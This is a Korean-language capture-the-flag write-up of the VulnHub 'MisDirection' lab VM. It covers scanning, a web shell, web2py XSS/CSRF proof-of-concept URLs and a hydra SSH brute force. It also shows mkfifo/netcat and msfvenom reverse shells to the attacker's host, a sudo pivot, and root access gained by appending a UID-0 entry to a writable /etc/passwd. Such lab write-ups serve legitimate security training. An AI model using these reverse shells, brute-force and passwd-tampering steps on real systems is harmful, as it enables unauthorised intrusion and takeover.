INFO
Name : MisDirection
Difficulty : Intermediate
Type : boot2root Source
VulnHub URL : https://www.vulnhub.com/entry/misdirection-1,371/
Entry : 11 / 35
GOAL
As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.
SETUP
I’m using both VMWare Workstation and Virtual box(depending on conditions of the image) to host Kali and the MisDirection image, with both VMs running in a NAT network(sometimes Bridged). I tried use VirtualBox first but couldn't reach the network by some reason, so I use it with Workstation this time.
TABLE OF CONTENTS
1. DISCOVERY
2. SCANNING
3. WEB RECONNAISSANCE
4. EXPLOITATION
5. POST EXPLOITATION
6. PRIVILEGE ESCALATION
1. DISCOVERY
: netdiscover
Currently scanning: 192.168.32.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 2 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.20.9 00:0c:29:fc:63:e5 2 120 VMware, Inc.
2. SCANNING
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Rocket httpd 1.2.6 (Python 2.7.15rc1)
3306/tcp open mysql MySQL (unauthorized)
8080/tcp open http Apache httpd 2.4.29 ((Ubuntu))
rocekt (python 2.7)
3. WEB RECONNAISSANCE
+ OSVDB-2813: /admin/database/wwForum.mdb: Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/cfg/configscreen.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configsite.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configsql.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configtache.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cms/htmltags.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/modules/cache.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/templates/header.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ /admin/html: Tomcat Manager / Host Manager interface found (pass protected)
+ /admin/status: Tomcat Server Status interface found (pass protected)
+ /admin/sites/new: ComfortableMexicanSofa CMS Engine Admin Backend (pass protected)
---- Scanning URL: http://192.168.20.9/ ----
+ http://192.168.20.9/.bash_history (CODE:400|SIZE:50)
+ http://192.168.20.9/.bashrc (CODE:400|SIZE:50)
+ http://192.168.20.9/.cache (CODE:400|SIZE:50)
+ http://192.168.20.9/.config (CODE:400|SIZE:50)
+ http://192.168.20.9/.cvs (CODE:400|SIZE:50)
+ http://192.168.20.9/.cvsignore (CODE:400|SIZE:50)
+ http://192.168.20.9/.forward (CODE:400|SIZE:50)
+ http://192.168.20.9/.git/HEAD (CODE:400|SIZE:50)
+ http://192.168.20.9/.history (CODE:400|SIZE:50)
+ http://192.168.20.9/.hta (CODE:400|SIZE:50)
+ http://192.168.20.9/.htaccess (CODE:400|SIZE:50)
+ http://192.168.20.9/.htpasswd (CODE:400|SIZE:50)
+ http://192.168.20.9/.listing (CODE:400|SIZE:50)
+ http://192.168.20.9/.listings (CODE:400|SIZE:50)
+ http://192.168.20.9/.mysql_history (CODE:400|SIZE:50)
+ http://192.168.20.9/.passwd (CODE:400|SIZE:50)
+ http://192.168.20.9/.perf (CODE:400|SIZE:50)
+ http://192.168.20.9/.profile (CODE:400|SIZE:50)
+ http://192.168.20.9/.rhosts (CODE:400|SIZE:50)
+ http://192.168.20.9/.sh_history (CODE:400|SIZE:50)
+ http://192.168.20.9/.ssh (CODE:400|SIZE:50)
+ http://192.168.20.9/.subversion (CODE:400|SIZE:50)
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 400 0 L 2 W 50 Ch "@"
000000035: 200 0 L 6 W 42 Ch "admin"
000000093: 400 0 L 2 W 50 Ch "bak-up"
000000089: 400 0 L 2 W 50 Ch "back-up"
000000163: 400 0 L 2 W 50 Ch "cgi-win"
000000162: 400 0 L 2 W 50 Ch "cgi-bin"
000000338: 400 0 L 2 W 50 Ch "fcgi-bin"
000000324: 200 133 L 470 W 6937 Ch "examples"
000000450: 400 0 L 2 W 50 Ch "java-sys"
000000495: 400 0 L 2 W 50 Ch "lost%2Bfound"
000000432: 200 113 L 387 W 5782 Ch "init"
000000545: 400 0 L 2 W 50 Ch "ms-sql"
000000549: 400 0 L 2 W 50 Ch "my-sql"
000000908: 400 0 L 2 W 50 Ch "WEB-INF"
000000921: 200 288 L 747 W 13705 Ch "welcome"
port 80
login page :
web2py
sign up 시도 : 안됨
취약점 검색 :
Reflected XSS(Cross Site Scripting) : CVE-2016-4807
GET URI - http://127.0.0.1:8000/admin/default/install_plugin/dasdasdasdad?plugin=math2py&source=anyurl
Vulnerable Parameter - source
Exploit - http://127.0.0.1:8000/admin/default/install_plugin/[applicationname]?plugin=math2py&source=javascript:alert(1)
Authentication Required - Yes(Administrator)
Steps To Reproduction
1) Go to this URL - http://127.0.0.1:8000/admin/default/install_plugin/[applicationname]?plugin=math2py&source=javascript:alert(1)
2) The parameter "source" value will get reflected on the page on "Here" button.
3) When you will click on that button "Here" XSS payload will get executed.
Video POC - https://www.youtube.com/watch?v=4j9hXJtVNbk
Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
============================================================================
CSRF(Cross Site Request Forgery): CVE-2016-4808
GET URI - http://127.0.0.1:8000/admin/default/enable/[applicationname]
Exploit - http://127.0.0.1:8000/admin/default/enable/[applicationname]
참조만 하고 계속 진행
port 8080 :
/8080 enumeration :
[ Running ] Nikto against 192.168.20.9:8080
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.20.9
+ Target Hostname: 192.168.20.9
+ Target Port: 8080
+ Start Time: 2021-03-30 15:33:18 (GMT9)
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 58a38e5a14c97, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3268: /help/: Directory indexing found.
+ /help/: Help directory should not be accessible
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /development/: Directory indexing found.
+ OSVDB-3092: /development/: This might be interesting...
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
/icons/ (Status: 403) [Size: 295]
/help/ (Status: 200) [Size: 739]
/scripts/ (Status: 200) [Size: 745]
/index.html (Status: 200) [Size: 10918]
/css/ (Status: 200) [Size: 737]
/development/ (Status: 200) [Size: 753]
/manual/ (Status: 200) [Size: 743]
/js/ (Status: 200) [Size: 735]
/shell/ (Status: 200) [Size: 741]
/images/ (Status: 200) [Size: 743]
/wordpress/ (Status: 200) [Size: 11419]
/debug/ (Status: 200) [Size: 12908]
/server-status/ (Status: 403) [Size: 303]
wordpress :
──(root💀takudaddy)-[/test]
└─# wpscan --url http://192.168.20.9:8080/wordpress --enumerate t
/debug :
쉘 사용이 가능!
4. EXPLOITATION
삽질 퍼레이드
p0wny@shell:…/www/html# cd /home
p0wny@shell:/home# ls
brexit
p0wny@shell:/home# ls -al
total 12
drwxr-xr-x 3 root root 4096 Jun 1 2019 .
drwxr-xr-x 23 root root 4096 Jun 1 2019 ..
drwxr-xr-x 6 brexit brexit 4096 Jun 1 2019 brexit
p0wny@shell:/home# cd brexit
p0wny@shell:/home/brexit# ls -al
total 60
drwxr-xr-x 6 brexit brexit 4096 Jun 1 2019 .
drwxr-xr-x 3 root root 4096 Jun 1 2019 ..
-rw------- 1 brexit brexit 0 Jun 1 2019 .bash_history
-rw-r--r-- 1 brexit brexit 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 brexit brexit 3771 Apr 4 2018 .bashrc
drwx------ 3 brexit brexit 4096 Jun 1 2019 .cache
drwx------ 3 brexit brexit 4096 Jun 1 2019 .gnupg
drwxrwxr-x 3 brexit brexit 4096 Jun 1 2019 .local
-rw-r--r-- 1 brexit brexit 807 Apr 4 2018 .profile
-rw-rw-r-- 1 brexit brexit 66 Jun 1 2019 .selected_editor
-rw------- 1 brexit brexit 9346 Jun 1 2019 .viminfo
-rwxrwxr-x 1 brexit brexit 90 Jun 1 2019 start-vote.sh
-r--r----- 1 brexit brexit 33 Jun 1 2019 user.txt
drwxrwxr-x 16 brexit brexit 4096 Mar 30 13:48 web2py
brexit라는 유저를 알았으니
hydra로 암호크랙도 해보고
┌──(root💀takudaddy)-[/attack]
└─# hydra -l brexit -P /usr/share/wordlists/rockyou.txt ssh://192.168.20.9
계속 삽질
p0wny@shell:/# uname -a
Linux misdirection 4.15.0-50-generic #54-Ubuntu SMP Mon May 6 18:46:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
p0wny@shell:/# whicn mc
sh: 1: whicn: not found
p0wny@shell:/# which nc
/bin/nc
p0wny@shell:/# which wget
/usr/bin/wget
p0wny@shell:/# which socat
p0wny@shell:/# netstat -nltup
(No info could be read for "-p": geteuid()=33 but you should be root.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp6 0 0 :::8080 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 192.168.20.9:68 0.0.0.0:* -
p0wny@shell:/var# which curl
/usr/bin/curl
p0wny@shell:/var# curl http://127.0.0.1/8000
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 50 100 50 0 0 25000 0 --:--:-- --:--:-- --:--:-- 25000
<html><body><h1>invalid request</h1></body></html>
하지만 핵심 작업은 바로 다음과 같다.
p0wny@shell:…/html/debug# id && whoami
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data
p0wny@shell:/home/brexit# sudo -l
Matching Defaults entries for www-data on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on localhost:
(brexit) NOPASSWD: /bin/bash
p0wny@shell:/home/brexit# sudo /bin/bash
sudo: no tty present and no askpass program specified
p0wny@shell:/home/brexit# sudo -u brexit /bin/bash
sudo: no tty present and no askpass program specified
user brexit,
brexit 권한으로 /bin/bash 실행 가능한데
해당 쉘은 tty(teletypewriter) 설정이 안되어 있어
실행이 안된다.
이런 경우 간단히 bash 명령어를
실행하면 해결된다.
연습을 위해 다른 접근 방법을 찾아본다.
간단히 nc로 포트를 오픈시켜보자.
p0wny@shell:…/html/debug# nc -e /bin/sh 192.168.20.1 7979
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
[-m minttl] [-O length] [-P proxy_username] [-p source_port]
[-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]
[-X proxy_protocol] [-x proxy_address[:port]] [destination] [port]
nc 버전이 -e 옵션을
지원하지 않는 버전이라
이 방법은 쓸 수 없다.
프로세스간 통신을 위해 사용하는
'fifo'를 통해 접속을 해본다.
실행 방법은 두 가지
1. 우선 공격 서버에서
리스너를 기동시켜 주고
┌──(root💀takudaddy)-[~]
└─# nc -lnvp 7979 1 ⨯ 2 ⚙
listening on [any] 7979 ...
상대편 쉘에서
mkfifo 명령어로 /tmp 폴더 아래
'f'라는 이름의 fifo를 생성해주면,
$ rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.20.1 7979 > /tmp/f
p0wny@shell:…/html/debug# rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.20.1 7979 > /tmp/f
연결에 성공하고
connect to [192.168.20.1] from (UNKNOWN) [192.168.20.9] 56790
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@misdirection:/home/brexit$
sudo -u brexit /bin/bash 명령어를 입력하면
www-data@misdirection:/home/brexit$ sudo -l
sudo -l
Matching Defaults entries for www-data on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on localhost:
(brexit) NOPASSWD: /bin/bash
www-data@misdirection:/home/brexit$ sudo /bin/bash
sudo /bin/bash
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data:
sudo: 3 incorrect password attempts
www-data@misdirection:/home/brexit$ sudo -u brexit /bin/bash
sudo -u brexit /bin/bash
brexit@misdirection:~$
brexit 유저로 전환에 성공했다.
2. mkfifo 명령어를 사용하는 다른 방법으로는
공격 서버에서 msfvenom으로 netcat reverse paylaod
를 만들면 넣어야 할 명령어를 생성해 주는데 (맨 아래 mkfifo 명령어 출력)
┌──(root💀takudaddy)-[~]
└─# msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.20.1 LPORT=7979
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 94 bytes
mkfifo /tmp/zydqc; nc 192.168.20.1 7979 0</tmp/zydqc | /bin/sh >/tmp/zydqc 2>&1; rm /tmp/zydqc
리스너 기동시키고
┌──(root💀takudaddy)-[~]
└─# nc -lnvp 7979 2 ⚙
listening on [any] 7979 ...
해당 mkfifo 명령어 내용을 복사해
침투서버에 넣어주면 된다.
p0wny@shell:…/html/debug# mkfifo /tmp/zydqc; nc 192.168.20.1 7979 0</tmp/zydqc | /bin/sh >/tmp/zydqc 2>&1; rm /tmp/zydqc
┌──(root💀takudaddy)-[~]
└─# nc -lnvp 7979 2 ⚙
listening on [any] 7979 ...
connect to [192.168.20.1] from (UNKNOWN) [192.168.20.9] 46318
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sudo -u brexit /bin/bash
id
uid=1000(brexit) gid=1000(brexit) groups=1000(brexit),24(cdrom),30(dip),46(plugdev),108(lxd)
성공!
5. POST EXPLOITATION
brexit@misdirection:/home$ cd brexit
cd brexit
brexit@misdirection:~$ ls
ls
start-vote.sh user.txt web2py
brexit@misdirection:~$ cat user.txt
cat user.txt
404b9193154be7fbbc56d7534cb26339
첫 번째 유저 플래그를 찾았다.
수정 가능한 파일 찾기
brexit@misdirection:~$ find / -writable -type f 2>/dev/null
.....
/sys/fs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/sys/fs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/etc/passwd
/etc/passwd 수정이 가능하단다
brexit@misdirection:~$ ls -l /etc/passwd
ls -l /etc/passwd
-rwxrwxr-- 1 root brexit 1617 Jun 1 2019 /etc/passwd
6. PRIVILEGE ESCALATION
openssl로 암호를 생성해 넣어주면 된다.
첫 번째 시도
brexit@misdirection:/tmp$ openssl passwd -1
openssl passwd -1
Password: taku
Verifying - Password: taku
$1$LJuuH2jz$GpmUyasBa/z1xyx/okkfq1
brexit@misdirection:/tmp$ su
su
Password: taku
su: Authentication failure
실패
두 번째 시도
brexit@misdirection:/var/www/html/debug$ openssl passwd -1 -salt t taku
openssl passwd -1 -salt t taku
$1$t$1ep7jYZ3RK3MfNWwHatNC1
brexit@misdirection:/var/www/html/debug$ echo "taku:$1$t$1ep7jYZ3RK3MfNWwHatNC1:0:0:root:/root:/bin/bash" >>/etc/passwd
<MfNWwHatNC1:0:0:root:/root:/bin/bash" >>/etc/passwd
brexit@misdirection:/var/www/html/debug$ tail -1 /etc/passwd
tail -1 /etc/passwd
taku:ep7jYZ3RK3MfNWwHatNC1:0:0:root:/root:/bin/bash
brexit@misdirection:/var/www/html/debug$ su taku
su taku
Password: taku
su: Authentication failure
실패
자세히 보니 echo로 넣은 암호가
그대로 들어가지 않고 일부 잘려서
들어가는게 원인인 듯.
실험해보니 특수문자 ($) 인식을
못하는 문제였다.
해서 세 번째 시도,
$ 기호 앞에 역슬래쉬를 넣어
다시 문구를 완성시켜 넣었더니
정상 입력 되었고 그대로 사용자를 전환!
brexit@misdirection:/tmp$ openssl passwd -1
openssl passwd -1
Password: taku
Verifying - Password: taku
$1$OJ.VOZR2$l4Xu6mUiPoA/exCFn1U15.
brexit@misdirection:/tmp$ echo "master:\$1\$OJ.VOZR2\$l4Xu6mUiPoA/exCFn1U15.:0:0:root:/root:/bin/bash" >> /etc/passwd
<exCFn1U15.:0:0:root:/root:/bin/bash" >> /etc/passwd
brexit@misdirection:/tmp$ tail -1 /etc/passwd
tail -1 /etc/passwd
master:$1$OJ.VOZR2$l4Xu6mUiPoA/exCFn1U15.:0:0:root:/root:/bin/bash
brexit@misdirection:/tmp$ su master
su master
Password: taku
root@misdirection:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root)
root@misdirection:/tmp# cd /root
cd /root
root@misdirection:~# ls
ls
root.txt
root@misdirection:~# cat root.txt
cat root.txt
0d2c6222bfdd3701e0fa12a9a9dc9c8c
성공!
root 플래그까지 확인했다.
끝!
728x90
'OSCP > Vulnahub' 카테고리의 다른 글
| 13. djinn (1) | 2021.04.01 |
|---|---|
| 12. Sar (0) | 2021.03.31 |
| 10. Symfonos 5 (0) | 2021.03.29 |
| 9. Symfonos 3 (0) | 2021.03.28 |
| 8. Symfonos 2 (0) | 2021.03.28 |